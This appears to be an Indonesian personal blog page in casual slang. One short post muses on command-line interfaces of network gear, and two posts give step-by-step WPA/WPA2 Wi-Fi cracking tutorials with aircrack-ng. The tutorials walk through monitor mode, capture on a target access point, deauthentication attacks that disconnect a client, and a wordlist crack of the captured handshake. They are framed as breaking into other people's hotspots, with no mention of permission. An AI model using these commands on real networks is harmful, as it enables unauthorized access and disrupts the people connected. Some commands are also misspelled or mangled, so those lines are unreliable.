Ini Ceritaku Mana Ceritamu, Linux, Networking, Server

Layar Hitam nan Membosankan (Vmware,Cisco,Alteon,Juniper Linux)

Jaringan komputer gak bisa jauh” dari yg namanya router ataupun server. beberapa tahun yang lalu, sempet nanya sama orang yg gawe di IBM.

“Mas.. gak bosen apa layar nya item gitu” , doi jawab, ini yg enak, klo tinggal pencet (GUI) lama kerja nya.

Pernyataan yg aneh menurut gw. Tapi, setelah belajar sana-sini, gw ada setujunya sama doi, SETENGAH SETUJU.   Buat gambaran bagi nubi-nubi  yang pengen tau hal dimana aktivitas seperti ini memberikan kesengan bagi mereka “internet”.

Berikut gw tampilin layar” membosankan yg di pelototin para enginner ya meskipun ada yg beberapa versi GUI nya.

juni

alteon

vmwareStep 4GNS3-cisco

Advertisements
Standard
./dev/sda /tmp/backtrack, Ppentest

Hack WPA/WP2 |wireless hacking|

1.Ubah Interface jadi monitoring mode

 #airmon-ng start wlan0

2.monitoring target

#airodump-ng -c <channel> –bssid <bssid target> -w psk <interfaces>

3. buka tab baru, monitoring tab nya jangan di tutup

4. PUTUSIN koneksi target :-p

#aireplay-ng –deauth 50 -a <bssid> -c <station id> <interfaces>

Tunggu si target diskonek, sampe si target konek nanti lo dapet handshake nya.

handshake dapet, tinggal eksekusi

#airkrack-ng -w /lokasi/word/lis/nya.txt -b <bssid> psk*.cap

 

note:

-c <channel> lo isi sama chanel si target, kalo lo punya basic wireless networking paham lah yg ini mah

–deauth 50 , nilai 50 bisa lo ganti. maksudnya tu seberapa banyak paket yg dikirim biar si target diskonek.

Os yang di pake backtrack/kali. lo juga bisa pake OS lain nya, yg bin nya .deb /.rpm. tapi mesti install paketan software yang diatas. gw sendiri pake ubuntu sama fedora security.

tanda handshake udah dapet, liat di terminal yang lagi memonitoring, nanti ada tulisan handshake nya.

 

 

Semoga berhasil

Standard
./dev/sda /tmp/backtrack, Ppentest

crack wifi

Tool.

  1. PC linux mw binary .deb / .rpm suka-suka lo.
  2. Aircrack-ng, airmon-ng,aireplay-ng,airodump-ng.
  3. Wireless buat nangkep wifi nya.

Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0

Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
catatan : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
keterangan: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis
                   pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
keterangan: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket
                  handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
keterangan : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt

source “http://forum.electronicglobal.com/t80-tutorial-cracking-password-hotspot-wpa-psk-dengan-linux-backtrack&#8221;

Standard